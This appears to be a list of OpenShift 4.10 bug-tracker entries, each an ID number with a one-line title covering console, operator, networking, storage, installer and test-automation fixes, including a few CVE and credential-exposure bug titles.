1999556 - "master" pool should be updated before the CVO reports available at the new version occurred
1999578 - AWS EFS CSI tests are constantly failing
1999603 - Memory Manager allows Guaranteed QoS Pod with hugepages requested is exactly equal to the left over Hugepages
1999619 - cloudinit is malformatted if a user sets a password during VM creation flow
1999621 - Empty ssh_authorized_keys entry is added to VM's cloudinit if created from a customize flow
1999649 - MetalLB: Only one type of IP address can be assigned to service on dual stack cluster from a address pool that have both IPv4 and IPv6 addresses defined
1999668 - openshift-install destroy cluster panic's when given invalid credentials to cloud provider (Azure Stack Hub)
1999734 - IBM Cloud CIS Instance CRN missing in infrastructure manifest/resource
1999771 - revert "force cert rotation every couple days for development" in 4.10
1999784 - CVE-2021-3749 nodejs-axios: Regular expression denial of service in trim function
1999796 - Openshift Console Helm tab is not showing helm releases in a namespace when there is high number of deployments in the same namespace.
1999836 - Admin web-console inconsistent status summary of sparse ClusterOperator conditions
1999903 - Click "This is a CD-ROM boot source" ticking "Use template size PVC" on pvc upload form
1999983 - No way to clear upload error from template boot source
2000081 - [IPI baremetal] The metal3 pod failed to restart when switching from Disabled to Managed provisioning without specifying provisioningInterface parameter
2000096 - Git URL is not re-validated on edit build-config form reload
2000216 - Successfully imported ImageStreams are not resolved in DeploymentConfig
2000236 - Confusing usage message from dynkeepalived CLI
2000268 - Mark cluster unupgradable if vcenter, esxi versions or HW versions are unsupported
2000430 - bump cluster-api-provider-ovirt version in installer
2000450 - 4.10: Enable static PV multi-az test
2000490 - All critical alerts shipped by CMO should have links to a runbook
2000521 - Kube-apiserver CO degraded due to failed conditional check (ConfigObservationDegraded)
2000573 - Incorrect StorageCluster CR created and ODF cluster getting installed with 2 Zone OCP cluster
2000628 - ibm-flashsystem-storage-storagesystem got created without any warning even when the attempt was cancelled
2000651 - ImageStreamTag alias results in wrong tag and invalid link in Web Console
2000754 - IPerf2 tests should be lower
2000846 - Structure logs in the entire codebase of Local Storage Operator
2000872 - [tracker] container is not able to list on some directories within the nfs after upgrade to 4.7.24
2000877 - OCP ignores STOPSIGNAL in Dockerfile and sends SIGTERM
2000938 - CVO does not respect changes to a Deployment strategy
2000963 - 'Inline-volume (default fs)] volumes should store data' tests are failing on OKD with updated selinux-policy
2001008 - [MachineSets] CloneMode defaults to linkedClone, but I don't have snapshot and should be fullClone
2001240 - Remove response headers for downloads of binaries from OpenShift WebConsole
2001295 - Remove openshift:kubevirt-machine-controllers decleration from machine-api
2001317 - OCP Platform Quota Check - Inaccurate MissingQuota error
2001337 - Details Card in ODF Dashboard mentions OCS
2001339 - fix text content hotplug
2001413 - [e2e][automation] add/delete nic and disk to template
2001441 - Test: oc adm must-gather runs successfully for audit logs - fail due to startup log
2001442 - Empty termination.log file for the kube-apiserver has too permissive mode
2001479 - IBM Cloud DNS unable to create/update records
2001566 - Enable alerts for prometheus operator in UWM
2001575 - Clicking on the perspective switcher shows a white page with loader
2001577 - Quick search placeholder is not displayed properly when the search string is removed
2001578 - [e2e][automation] add tests for vm dashboard tab
2001605 - PVs remain in Released state for a long time after the claim is deleted
2001617 - BucketClass Creation is restricted on 1st page but enabled using side navigation options
2001620 - Cluster becomes degraded if it can't talk to Manila
2001760 - While creating 'Backing Store', 'Bucket Class', 'Namespace Store' user is navigated to 'Installed Operators' page after clicking on ODF
2001761 - Unable to apply cluster operator storage for SNO on GCP platform.
2001765 - Some error message in the log of diskmaker-manager caused confusion
2001784 - show loading page before final results instead of showing a transient message No log files exist
2001804 - Reload feature on Environment section in Build Config form does not work properly
2001810 - cluster admin unable to view BuildConfigs in all namespaces
2001817 - Failed to load RoleBindings list that will lead to ‘Role name’ is not able to be selected on Create RoleBinding page as well
2001823 - OCM controller must update operator status
2001825 - [SNO]ingress/authentication clusteroperator degraded when enable ccm from start
2001835 - Could not select image tag version when create app from dev console
2001855 - Add capacity is disabled for ocs-storagecluster
2001856 - Repeating event: MissingVersion no image found for operand pod
2001959 - Side nav list borders don't extend to edges of container
2002007 - Layout issue on "Something went wrong" page
2002010 - ovn-kube may never attempt to retry a pod creation
2002012 - Cannot change volume mode when cloning a VM from a template
2002027 - Two instances of Dotnet helm chart show as one in topology
2002075 - opm render does not automatically pulling in the image(s) used in the deployments
2002121 - [OVN] upgrades failed for IPI OSP16 OVN IPSec cluster
2002125 - Network policy details page heading should be updated to Network Policy details
2002133 - [e2e][automation] add support/virtualization and improve deleteResource
2002134 - [e2e][automation] add test to verify vm details tab
2002215 - Multipath day1 not working on s390x
2002238 - Image stream tag is not persisted when switching from yaml to form editor
2002262 - [vSphere] Incorrect user agent in vCenter sessions list
2002266 - SinkBinding create form doesn't allow to use subject name, instead of label selector
2002276 - OLM fails to upgrade operators immediately
2002300 - Altering the Schedule Profile configurations doesn't affect the placement of the pods
2002354 - Missing DU configuration "Done" status reporting during ZTP flow
2002362 - Dynamic Plugin - ConsoleRemotePlugin for webpack doesn't use commonjs
2002368 - samples should not go degraded when image allowedRegistries blocks imagestream creation
2002372 - Pod creation failed due to mismatched pod IP address in CNI and OVN
2002397 - Resources search is inconsistent
2002434 - CRI-O leaks some children PIDs
2002443 - Getting undefined error on create local volume set page
2002461 - DNS operator performs spurious updates in response to API's defaulting of service's internalTrafficPolicy
2002504 - When the openshift-cluster-storage-operator is degraded because of "VSphereProblemDetectorController_SyncError", the insights operator is not sending the logs from all pods.
2002559 - User preference for topology list view does not follow when a new namespace is created
2002567 - Upstream SR-IOV worker doc has broken links
2002588 - Change text to be sentence case to align with PF
2002657 - ovn-kube egress IP monitoring is using a random port over the node network
2002713 - CNO: OVN logs should have millisecond resolution
2002748 - [ICNI2] 'ErrorAddingLogicalPort' failed to handle external GW check: timeout waiting for namespace event
2002759 - Custom profile should not allow not including at least one required HTTP2 ciphersuite
2002763 - Two storage systems getting created with external mode RHCS
2002808 - KCM does not use web identity credentials
2002834 - Cluster-version operator does not remove unrecognized volume mounts
2002896 - Incorrect result return when user filter data by name on search page
2002950 - Why spec.containers.command is not created with "oc create deploymentconfig --image= -- "
2003096 - [e2e][automation] check bootsource URL is displaying on review step
2003113 - OpenShift Baremetal IPI installer uses first three defined nodes under hosts in install-config for master nodes instead of filtering the hosts with the master role
2003120 - CI: Uncaught error with ResizeObserver on operand details page
2003145 - Duplicate operand tab titles causes "two children with the same key" warning
2003164 - OLM, fatal error: concurrent map writes
2003178 - [FLAKE][knative] The UI doesn't show updated traffic distribution after accepting the form
2003193 - Kubelet/crio leaks netns and veth ports in the host
2003195 - OVN CNI should ensure host veths are removed
2003204 - Jenkins all new container images (openshift4/ose-jenkins) not supporting '-e JENKINS_PASSWORD=password' ENV which was working for old container images
2003206 - Namespace stuck terminating: Failed to delete all resource types, 1 remaining: unexpected items still remain in namespace
2003239 - "[sig-builds][Feature:Builds][Slow] can use private repositories as build input" tests fail outside of CI
2003244 - Revert libovsdb client code
2003251 - Patternfly components with list element has list item bullet when they should not.
2003252 - "[sig-builds][Feature:Builds][Slow] starting a build using CLI start-build test context override environment BUILD_LOGLEVEL in buildconfig" tests do not work as expected outside of CI
2003269 - Rejected pods should be filtered from admission regression
2003357 - QE- Removing the epic tags for gherkin tags related to 4.9 Release
2003426 - [e2e][automation] add test for vm details bootorder
2003496 - [e2e][automation] add test for vm resources requirment settings
2003641 - All metal ipi jobs are failing in 4.10
2003651 - ODF4.9+LSO4.8 installation via UI, StorageCluster move to error state
2003655 - [IPI ON-PREM] Keepalived chk_default_ingress track script failed even though default router pod runs on node
2003683 - Samples operator is panicking in CI
2003711 - [UI] Empty file ceph-external-cluster-details-exporter.py downloaded from external cluster "Connection Details" page
2003715 - Error on creating local volume set after selection of the volume mode
2003743 - Remove workaround keeping /boot RW for kdump support
2003775 - etcd pod on CrashLoopBackOff after master replacement procedure
2003788 - CSR reconciler report error constantly when BYOH CSR approved by other Approver
2003792 - Monitoring metrics query graph flyover panel is useless
2003808 - Add Sprint 207 translations
2003845 - Project admin cannot access image vulnerabilities view
2003859 - sdn emits events with garbage messages
2003896 - (release-4.10) ApiRequestCounts conditional gatherer
2004009 - 4.10: Fix multi-az zone scheduling e2e for 5 control plane replicas
2004051 - CMO can report as being Degraded while node-exporter is deployed on all nodes
2004059 - [e2e][automation] fix current tests for downstream
2004060 - Trying to use basic spring boot sample causes crash on Firefox
2004101 - [UI] When creating storageSystem deployment type dropdown under advanced setting doesn't close after selection
2004127 - [flake] openshift-controller-manager event reason/SuccessfulDelete occurs too frequently
2004203 - build config's created prior to 4.8 with image change triggers can result in trigger storm in OCM/openshift-apiserver
2004313 - [RHOCP 4.9.0-rc.0] Failing to deploy Azure cluster from the macOS installer - ignition_bootstrap.ign: no such file or directory
2004449 - Boot option recovery menu prevents image boot
2004451 - The backup filename displayed in the RecentBackup message is incorrect
2004459 - QE - Modified the AddFlow gherkin scripts and automation scripts
2004508 - TuneD issues with the recent ConfigParser changes.
2004510 - openshift-gitops operator hooks gets unauthorized (401) errors during jobs executions
2004542 - [osp][octavia lb] cannot create LoadBalancer type svcs
2004578 - Monitoring and node labels missing for an external storage platform
2004585 - prometheus-k8s-0 cpu usage keeps increasing for the first 3 days
2004596 - [4.10] Bootimage bump tracker
2004597 - Duplicate ramdisk log containers running
2004600 - Duplicate ramdisk log containers running
2004609 - output of "crictl inspectp" is not complete
2004625 - BMC credentials could be logged if they change
2004632 - When LE takes a large amount of time, multiple whereabouts are seen
2004721 - ptp/worker custom threshold doesn't change ptp events threshold
2004736 - [knative] Create button on new Broker form is inactive despite form being filled
2004796 - [e2e][automation] add test for vm scheduling policy
2004814 - (release-4.10) OCM controller - change type of the etc-pki-entitlement secret to opaque
2004870 - [External Mode] Insufficient spacing along y-axis in RGW Latency Performance Card
2004901 - [e2e][automation] improve kubevirt devconsole tests
2004962 - Console frontend job consuming too much CPU in CI
2005014 - state of ODF StorageSystem is misreported during installation or uninstallation
2005052 - Adding a MachineSet selector matchLabel causes orphaned Machines
2005179 - pods status filter is not taking effect
2005182 - sync list of deprecated apis about to be removed
2005282 - Storage cluster name is given as title in StorageSystem details page
2005355 - setuptools 58 makes Kuryr CI fail
2005407 - ClusterNotUpgradeable Alert should be set to Severity Info
2005415 - PTP operator with sidecar api configured throws bind: address already in use
2005507 - SNO spoke cluster failing to reach coreos.live.rootfs_url is missing url in console
2005554 - The switch status of the button "Show default project" is not revealed correctly in code
2005581 - 4.8.12 to 4.9 upgrade hung due to cluster-version-operator pod CrashLoopBackOff: error creating clients: invalid configuration: no configuration has been provided, try setting KUBERNETES_MASTER environment variable
2005761 - QE - Implementing crw-basic feature file
2005783 - Fix accessibility issues in the "Internal" and "Internal - Attached Mode" Installation Flow
2005811 - vSphere Problem Detector operator - ServerFaultCode: InvalidProperty
2005854 - SSH NodePort service is created for each VM
2005901 - KS, KCM and KA going Degraded during master nodes upgrade
2005902 - Current UI flow for MCG only deployment is confusing and doesn't reciprocate any message to the end-user
2005926 - PTP operator NodeOutOfPTPSync rule is using max offset from the master instead of openshift_ptp_clock_state metrics
2005971 - Change telemeter to report the Application Services product usage metrics
2005997 - SELinux domain container_logreader_t does not have a policy to follow sym links for log files
2006025 - Description to use an existing StorageClass while creating StorageSystem needs to be re-phrased
2006060 - ocs-storagecluster-storagesystem details are missing on UI for MCG Only and MCG only in LSO mode deployment types
2006101 - Power off fails for drivers that don't support Soft power off
2006243 - Metal IPI upgrade jobs are running out of disk space
2006291 - bootstrapProvisioningIP set incorrectly when provisioningNetworkCIDR doesn't use the 0th address
2006308 - Backing Store YAML tab on click displays a blank screen on UI
2006325 - Multicast is broken across nodes
2006329 - Console only allows Web Terminal Operator to be installed in OpenShift Operators
2006364 - IBM Cloud: Set resourceGroupId for resourceGroups, not simply resource
2006561 - [sig-instrumentation] Prometheus when installed on the cluster shouldn't have failing rules evaluation [Skipped:Disconnected] [Suite:openshift/conformance/parallel]
2006690 - OS boot failure "x64 Exception Type 06 - Invalid Opcode Exception"
2006714 - add retry for etcd errors in kube-apiserver
2006767 - KubePodCrashLooping may not fire
2006803 - Set CoreDNS cache entries for forwarded zones
2006861 - Add Sprint 207 part 2 translations
2006945 - race condition can cause crashlooping bootstrap kube-apiserver in cluster-bootstrap
2006947 - e2e-aws-proxy for 4.10 is permafailing with samples operator errors
2006975 - clusteroperator/etcd status condition should not change reasons frequently due to EtcdEndpointsDegraded
2007085 - Intermittent failure mounting /run/media/iso when booting live ISO from USB stick
2007136 - Creation of BackingStore, BucketClass, NamespaceStore fails
2007271 - CI Integration for Knative test cases
2007289 - kubevirt tests are failing in CI
2007322 - Devfile/Dockerfile import does not work for unsupported git host
2007328 - Updated patternfly to v4.125.3 and pf.quickstarts to v1.2.3.
2007379 - Events are not generated for master offset for ordinary clock
2007443 - [ICNI 2.0] Loadbalancer pods do not establish BFD sessions with all workers that host pods for the routed namespace
2007455 - cluster-etcd-operator: render command should fail if machineCidr contains reserved address
2007495 - Large label value for the metric kubelet_started_pods_errors_total with label message when there is a error
2007522 - No new local-storage-operator-metadata-container is build for 4.10
2007551 - No new ose-aws-efs-csi-driver-operator-bundle-container is build for 4.10
2007580 - Azure cilium installs are failing e2e tests
2007581 - Too many haproxy processes in default-router pod causing high load average after upgrade from v4.8.3 to v4.8.10
2007677 - Regression: core container io performance metrics are missing for pod, qos, and system slices on nodes
2007692 - 4.9 "old-rhcos" jobs are permafailing with storage test failures
2007710 - ci/prow/e2e-agnostic-cmd job is failing on prow
2007757 - must-gather extracts imagestreams in the "openshift" namespace, but not Templates
2007802 - AWS machine actuator get stuck if machine is completely missing
2008096 - TestAWSFinalizerDeleteS3Bucket sometimes fails to teardown operator
2008119 - The serviceAccountIssuer field on Authentication CR is reseted to “” when installation process
2008151 - Topology breaks on clicking in empty state
2008185 - Console operator go.mod should use go 1.16.version
2008201 - openstack-az job is failing on haproxy idle test
2008207 - vsphere CSI driver doesn't set resource limits
2008223 - gather_audit_logs: fix oc command line to get the current audit profile
2008235 - The Save button in the Edit DC form remains disabled
2008256 - Update Internationalization README with scope info
2008321 - Add correct documentation link for MON_DISK_LOW
2008462 - Disable PodSecurity feature gate for 4.10
2008490 - Backing store details page does not contain all the kebab actions.
2008521 - gcp-hostname service should correct invalid search entries in resolv.conf
2008532 - CreateContainerConfigError:: failed to prepare subPath for volumeMount
2008539 - Registry doesn't fall back to secondary ImageContentSourcePolicy Mirror
2008540 - HighlyAvailableWorkloadIncorrectlySpread always fires on upgrade on cluster with two workers
2008599 - Azure Stack UPI does not have Internal Load Balancer
2008612 - Plugin asset proxy does not pass through browser cache headers
2008712 - VPA webhook timeout prevents all pods from starting
2008733 - kube-scheduler: exposed /debug/pprof port
2008911 - Prometheus repeatedly scaling prometheus-operator replica set
2008926 - [sig-api-machinery] API data in etcd should be stored at the correct location and version for all resources [Serial] [Suite:openshift/conformance/serial]
2008987 - OpenShift SDN Hosted Egress IP's are not being scheduled to nodes after upgrade to 4.8.12
2009055 - Instances of OCS to be replaced with ODF on UI
2009078 - NetworkPodsCrashLooping alerts in upgrade CI jobs
2009083 - opm blocks pruning of existing bundles during add
2009111 - [IPI-on-GCP] 'Install a cluster with nested virtualization enabled' failed due to unable to launch compute instances
2009131 - [e2e][automation] add more test about vmi
2009148 - [e2e][automation] test vm nic presets and options
2009233 - ACM policy object generated by PolicyGen conflicting with OLM Operator
2009253 - [BM] [IPI] [DualStack] apiVIP and ingressVIP should be of the same primary IP family
2009298 - Service created for VM SSH access is not owned by the VM and thus is not deleted if the VM is deleted
2009384 - UI changes to support BindableKinds CRD changes
2009404 - ovnkube-node pod enters CrashLoopBackOff after OVN_IMAGE is swapped
2009424 - Deployment upgrade is failing availability check
2009454 - Change web terminal subscription permissions from get to list
2009465 - container-selinux should come from rhel8-appstream
2009514 - Bump OVS to 2.16-15
2009555 - Supermicro X11 system not booting from vMedia with AI
2009623 - Console: Observe > Metrics page: Table pagination menu shows bullet points
2009664 - Git Import: Edit of knative service doesn't work as expected for git import flow
2009699 - Failure to validate flavor RAM
2009754 - Footer is not sticky anymore in import forms
2009785 - CRI-O's version file should be pinned by MCO
2009791 - Installer: ibmcloud ignores install-config values
2009823 - [sig-arch] events should not repeat pathologically - reason/VSphereOlderVersionDetected Marking cluster un-upgradeable because one or more VMs are on hardware version vmx-13
2009840 - cannot build extensions on aarch64 because of unavailability of rhel-8-advanced-virt repo
2009859 - Large number of sessions created by vmware-vsphere-csi-driver-operator during e2e tests
2009873 - Stale Logical Router Policies and Annotations for a given node
2009879 - There should be test-suite coverage to ensure admin-acks work as expected
2009888 - SRO package name collision between official and community version
2010073 - uninstalling and then reinstalling sriov-network-operator is not working
2010174 - 2 PVs get created unexpectedly with different paths that actually refer to the same device on the node.
2010181 - Environment variables not getting reset on reload on deployment edit form
2010310 - [sig-instrumentation][Late] OpenShift alerting rules should have description and summary annotations [Skipped:Disconnected] [Suite:openshift/conformance/parallel]
2010341 - OpenShift Alerting Rules Style-Guide Compliance
2010342 - Local console builds can have out of memory errors
2010345 - OpenShift Alerting Rules Style-Guide Compliance
2010348 - Reverts PIE build mode for K8S components
2010352 - OpenShift Alerting Rules Style-Guide Compliance
2010354 - OpenShift Alerting Rules Style-Guide Compliance
2010359 - OpenShift Alerting Rules Style-Guide Compliance
2010368 - OpenShift Alerting Rules Style-Guide Compliance
2010376 - OpenShift Alerting Rules Style-Guide Compliance
2010662 - Cluster is unhealthy after image-registry-operator tests
2010663 - OpenShift Alerting Rules Style-Guide Compliance (ovn-kubernetes subcomponent)
2010665 - Bootkube tries to use oc after cluster bootstrap is done and there is no API
2010698 - [BM] [IPI] [Dual Stack] Installer must ensure ipv6 short forms too if clusterprovisioning IP is specified as ipv6 address
2010719 - etcdHighNumberOfFailedGRPCRequests runbook is missing
2010864 - Failure building EFS operator
2010910 - ptp worker events unable to identify interface for multiple interfaces
2010911 - RenderOperatingSystem() returns wrong OS version on OCP 4.7.24
2010921 - Azure Stack Hub does not handle additionalTrustBundle
2010931 - SRO CSV uses non default category "Drivers and plugins"
2010946 - concurrent CRD from ovirt-csi-driver-operator gets reconciled by CVO after deployment, changing CR as well.
2011038 - optional operator conditions are confusing
2011063 - CVE-2021-39226 grafana: Snapshot authentication bypass
2011171 - diskmaker-manager constantly redeployed by LSO when creating LV's
2011293 - Build pod are not pulling images if we are not explicitly giving the registry name with the image
2011368 - Tooltip in pipeline visualization shows misleading data
2011386 - [sig-arch] Check if alerts are firing during or after upgrade success --- alert KubePodNotReady fired for 60 seconds with labels
2011411 - Managed Service's Cluster overview page contains link to missing Storage dashboards
2011443 - Cypress tests assuming Admin Perspective could fail on shared/reference cluster
2011513 - Kubelet rejects pods that use resources that should be freed by completed pods
2011668 - Machine stuck in deleting phase in VMware "reconciler failed to Delete machine"
2011693 - (release-4.10) "insightsclient_request_recvreport_total" metric is always incremented
2011698 - After upgrading cluster to 4.8 the kube-state-metrics service doesn't export namespace labels anymore
2011733 - Repository README points to broken documentarion link
2011753 - Ironic resumes clean before raid configuration job is actually completed
2011809 - The nodes page in the openshift console doesn't work. You just get a blank page
2011822 - Obfuscation doesn't work at clusters with OVN
2011882 - SRO helm charts not synced with templates
2011893 - Validation: BMC driver ipmi is not supported for secure UEFI boot
2011896 - [4.10] ClusterVersion Upgradeable=False MultipleReasons should include all messages
2011903 - vsphere-problem-detector: session leak
2011927 - OLM should allow users to specify a proxy for GRPC connections
2011956 - [tracker] Kubelet rejects pods that use resources that should be freed by completed pods
2011960 - [tracker] Storage operator is not available after reboot cluster instances
2011971 - ICNI2 pods are stuck in ContainerCreating state
2011972 - Ingress operator not creating wildcard route for hypershift clusters
2011977 - SRO bundle references non-existent image
2012069 - Refactoring Status controller
2012177 - [OCP 4.9 + OCS 4.8.3] Overview tab is missing under Storage after successful deployment on UI
2012228 - ibmcloud: credentialsrequests invalid for machine-api-operator: resource-group
2012233 - [IBMCLOUD] IPI: "Exceeded limit of remote rules per security group (the limit is 5 remote rules per security group)"
2012235 - [IBMCLOUD] IPI: IBM cloud provider requires ResourceGroupName in cloudproviderconfig
2012317 - Dynamic Plugins: ListPageCreateDropdown items cut off
2012407 - [e2e][automation] improve vm tab console tests
2012426 - ThanosSidecarBucketOperationsFailed/ThanosSidecarUnhealthy alerts don't have namespace label
2012562 - migration condition is not detected in list view
2012770 - when using expression metric openshift_apps_deploymentconfigs_last_failed_rollout_time namespace label is re-written
2012780 - The port 50936 used by haproxy is occupied by kube-apiserver
2012838 - Setting the default maximum container root partition size for Overlay with CRI-O stop working
2012902 - Neutron Ports assigned to Completed Pods are not reused Edit
2012915 - kube_persistentvolumeclaim_labels and kube_persistentvolume_labels are missing in OCP 4.8 monitoring stack
2012971 - Disable operands deletes
2013034 - Cannot install to openshift-nmstate namespace
2013127 - OperatorHub links could not be opened in a new tabs (sharing and open a deep link works fine)
2013199 - post reboot of node SRIOV policy taking huge time
2013203 - UI breaks when trying to create block pool before storage cluster/system creation
2013222 - Full breakage for nightly payload promotion
2013273 - Nil pointer exception when phc2sys options are missing
2013321 - TuneD: high CPU utilization of the TuneD daemon.
2013416 - Multiple assets emit different content to the same filename
2013431 - Application selector dropdown has incorrect font-size and positioning
2013528 - mapi_current_pending_csr is always set to 1 on OpenShift Container Platform 4.8
2013545 - Service binding created outside topology is not visible
2013599 - Scorecard support storage is not included in ocp4.9
2013632 - Correction/Changes in Quick Start Guides for ODF 4.9 (Install ODF guide)
2013646 - fsync controller will show false positive if gaps in metrics are observed.
2013710 - ZTP Operator subscriptions for 4.9 release branch should point to 4.9 by default
2013751 - Service details page is showing wrong in-cluster hostname
2013787 - There are two tittle 'Network Attachment Definition Details' on NAD details page
2013871 - Resource table headings are not aligned with their column data
2013895 - Cannot enable accelerated network via MachineSets on Azure
2013920 - "--collector.filesystem.ignored-mount-points is DEPRECATED and will be removed in 2.0.0, use --collector.filesystem.mount-points-exclude"
2013930 - Create Buttons enabled for Bucket Class, Backingstore and Namespace Store in the absence of Storagesystem(or MCG)
2013969 - oVIrt CSI driver fails on creating PVCs on hosted engine storage domain
2013990 - Observe dashboard crashs on reload when perspective has changed (in another tab)
2013996 - Project detail page: Action "Delete Project" does nothing for the default project
2014071 - Payload imagestream new tags not properly updated during cluster upgrade
2014153 - SRIOV exclusive pooling
2014202 - [OCP-4.8.10] OVN-Kubernetes: service IP is not responding when egressIP set to the namespace
2014238 - AWS console test is failing on importing duplicate YAML definitions
2014245 - Several aria-labels, external links, and labels aren't internationalized
2014248 - Several files aren't internationalized
2014352 - Could not filter out machine by using node name on machines page
2014464 - Unexpected spacing/padding below navigation groups in developer perspective
2014471 - Helm Release notes tab is not automatically open after installing a chart for other languages
2014486 - Integration Tests: OLM single namespace operator tests failing
2014488 - Custom operator cannot change orders of condition tables
2014497 - Regex slows down different forms and creates too much recursion errors in the log
2014538 - Kuryr controller crash looping on self._get_vip_port(loadbalancer).id 'NoneType' object has no attribute 'id'
2014614 - Metrics scraping requests should be assigned to exempt priority level
2014710 - TestIngressStatus test is broken on Azure
2014954 - The prometheus-k8s-{0,1} pods are CrashLoopBackoff repeatedly
2014995 - oc adm must-gather cannot gather audit logs with 'None' audit profile
2015115 - [RFE] PCI passthrough
2015133 - [IBMCLOUD] ServiceID API key credentials seems to be insufficient for ccoctl '--resource-group-name' parameter
2015154 - Support ports defined networks and primarySubnet
2015274 - Yarn dev fails after updates to dynamic plugin JSON schema logic
2015337 - 4.9.0 GA MetalLB operator image references need to be adjusted to match production
2015386 - Possibility to add labels to the built-in OCP alerts
2015395 - Table head on Affinity Rules modal is not fully expanded
2015416 - CI implementation for Topology plugin
2015418 - Project Filesystem query returns No datapoints found
2015420 - No vm resource in project view's inventory
2015422 - No conflict checking on snapshot name
2015472 - Form and YAML view switch button should have distinguishable status
2015481 - [4.10] sriov-network-operator daemon pods are failing to start
2015493 - Cloud Controller Manager Operator does not respect 'additionalTrustBundle' setting
2015496 - Storage - PersistentVolumes : Claim colum value 'No Claim' in English
2015498 - [UI] Add capacity when not applicable (for MCG only deployment and External mode cluster) fails to pass any info. to user and tries to just load a blank screen on 'Add Capacity' button click
2015506 - Home - Search - Resources - APIRequestCount : hard to select an item from ellipsis menu
2015515 - Kubelet checks all providers even if one is configured: NoCredentialProviders: no valid providers in chain.
2015535 - Administration - ResourceQuotas - ResourceQuota details: Inside Pie chart 'x% used' is in English
2015549 - Observe - Metrics: Column heading and pagination text is in English
2015557 - Workloads - DeploymentConfigs : Error message is in English
2015568 - Compute - Nodes : CPU column's values are in English
2015635 - Storage operator fails causing installation to fail on ASH
2015660 - "Finishing boot source customization" screen should not use term "patched"
2015793 - [hypershift] The collect-profiles job's pods should run on the control-plane node
2015806 - Metrics view in Deployment reports "Forbidden" when not cluster-admin
2015819 - Conmon sandbox processes run on non-reserved CPUs with workload partitioning
2015837 - OS_CLOUD overwrites install-config's platform.openstack.cloud
2015950 - update from 4.7.22 to 4.8.11 is failing due to large amount of secrets to watch
2015952 - RH CodeReady Workspaces Operator in e2e testing will soon fail
2016004 - [RFE] RHCOS: help determining whether a user-provided image was already booted (Ignition provisioning already performed)
2016008 - [4.10] Bootimage bump tracker
2016052 - No e2e CI presubmit configured for release component azure-file-csi-driver
2016053 - No e2e CI presubmit configured for release component azure-file-csi-driver-operator
2016054 - No e2e CI presubmit configured for release component cluster-autoscaler
2016055 - No e2e CI presubmit configured for release component console
2016058 - openshift-sync does not synchronise in "ose-jenkins:v4.8"
2016064 - No e2e CI presubmit configured for release component ibm-cloud-controller-manager
2016065 - No e2e CI presubmit configured for release component ibmcloud-machine-controllers
2016175 - Pods get stuck in ContainerCreating state when attaching volumes fails on SNO clusters.
2016179 - Add Sprint 208 translations
2016228 - Collect Profiles pprof secret is hardcoded to openshift-operator-lifecycle-manager
2016235 - should update to 7.5.11 for grafana resources version label
2016296 - Openshift virtualization : Create Windows Server 2019 VM using template : Fails
2016334 - shiftstack: SRIOV nic reported as not supported
2016352 - Some pods start before CA resources are present
2016367 - Empty task box is getting created for a pipeline without finally task
2016435 - Duplicate AlertmanagerClusterFailedToSendAlerts alerts
2016438 - Feature flag gating is missing in few extensions contributed via knative plugin
2016442 - OCPonRHV: pvc should be in Bound state and without error when choosing default sc
2016446 - [OVN-Kubernetes] Egress Networkpolicy is failing Intermittently for statefulsets
2016453 - Complete i18n for GaugeChart defaults
2016479 - iface-id-ver is not getting updated for existing lsp
2016925 - Dashboards with All filter, change to a specific value and change back to All, data will disappear
2016951 - dynamic actions list is not disabling "open console" for stopped vms
2016955 - m5.large instance type for bootstrap node is hardcoded causing deployments to fail if instance type is not available
2016988 - NTO does not set io_timeout and max_retries for AWS Nitro instances
2017016 - [REF] Virtualization menu
2017036 - [sig-network-edge][Feature:Idling] Unidling should handle many TCP connections fails in periodic-ci-openshift-release-master-ci-4.9-e2e-openstack-ovn
2017050 - Dynamic Plugins: Shared modules loaded multiple times, breaking use of PatternFly
2017130 - t is not a function error navigating to details page
2017141 - Project dropdown has a dynamic inline width added which can cause min-width issue
2017244 - ovirt csi operator static files creation is in the wrong order
2017276 - [4.10] Volume mounts not created with the correct security context
2017327 - When run opm index prune failed with error removing operator package cic-operator FOREIGN KEY constraint failed.
2017427 - NTO does not restart TuneD daemon when profile application is taking too long
2017535 - Broken Argo CD link image on GitOps Details Page
2017547 - Siteconfig application sync fails with The AgentClusterInstall is invalid: spec.provisionRequirements.controlPlaneAgents: Required value when updating images references
2017564 - On-prem prepender dispatcher script overwrites DNS search settings
2017565 - CCMO does not handle additionalTrustBundle on Azure Stack
2017566 - MetalLB: Web Console -Create Address pool form shows address pool name twice
2017606 - [e2e][automation] add test to verify send key for VNC console
2017650 - [OVN]EgressFirewall cannot be applied correctly if cluster has windows nodes
2017656 - VM IP address is "undefined" under VM details -> ssh field
2017663 - SSH password authentication is disabled when public key is not supplied
2017680 - [gcp] Couldn’t enable support for instances with GPUs on GCP
2017732 - [KMS] Prevent creation of encryption enabled storageclass without KMS connection set
2017752 - (release-4.10) obfuscate identity provider attributes in collected authentication.operator.openshift.io resource
2017756 - overlaySize setting on containerruntimeconfig is ignored due to cri-o defaults
2017761 - [e2e][automation] dummy bug for 4.9 test dependency
2017872 - Add Sprint 209 translations
2017874 - The installer is incorrectly checking the quota for X instances instead of G and VT instances
2017879 - Add Chinese translation for "alternate"
2017882 - multus: add handling of pod UIDs passed from runtime
2017909 - [ICNI 2.0] ovnkube-masters stop processing add/del events for pods
2018042 - HorizontalPodAutoscaler CPU averageValue did not show up in HPA metrics GUI
2018093 - Managed cluster should ensure control plane pods do not run in best-effort QoS
2018094 - the tooltip length is limited
2018152 - CNI pod is not restarted when It cannot start servers due to ports being used
2018208 - e2e-metal-ipi-ovn-ipv6 are failing 75% of the time
2018234 - user settings are saved in local storage instead of on cluster
2018264 - Delete Export button doesn't work in topology sidebar (general issue with unknown CSV?)
2018272 - Deployment managed by link and topology sidebar links to invalid resource page (at least for Exports)
2018275 - Topology graph doesn't show context menu for Export CSV
2018279 - Edit and Delete confirmation modals for managed resource should close when the managed resource is clicked
2018380 - Migrate docs links to access.redhat.com
2018413 - Error: context deadline exceeded, OCP 4.8.9
2018428 - PVC is deleted along with VM even with "Delete Disks" unchecked
2018445 - [e2e][automation] enhance tests for downstream
2018446 - [e2e][automation] move tests to different level
2018449 - [e2e][automation] add test about create/delete network attachment definition
2018490 - [4.10] Image provisioning fails with file name too long
2018495 - Fix typo in internationalization README
2018542 - Kernel upgrade does not reconcile DaemonSet
2018880 - Get 'No datapoints found.' when query metrics about alert rule KubeCPUQuotaOvercommit and KubeMemoryQuotaOvercommit
2018884 - QE - Adapt crw-basic feature file to OCP 4.9/4.10 changes
2018935 - go.sum not updated, that ART extracts version string from, WAS: Missing backport from 4.9 for Kube bump PR#950
2018965 - e2e-metal-ipi-upgrade is permafailing in 4.10
2018985 - The rootdisk size is 15Gi of windows VM in customize wizard
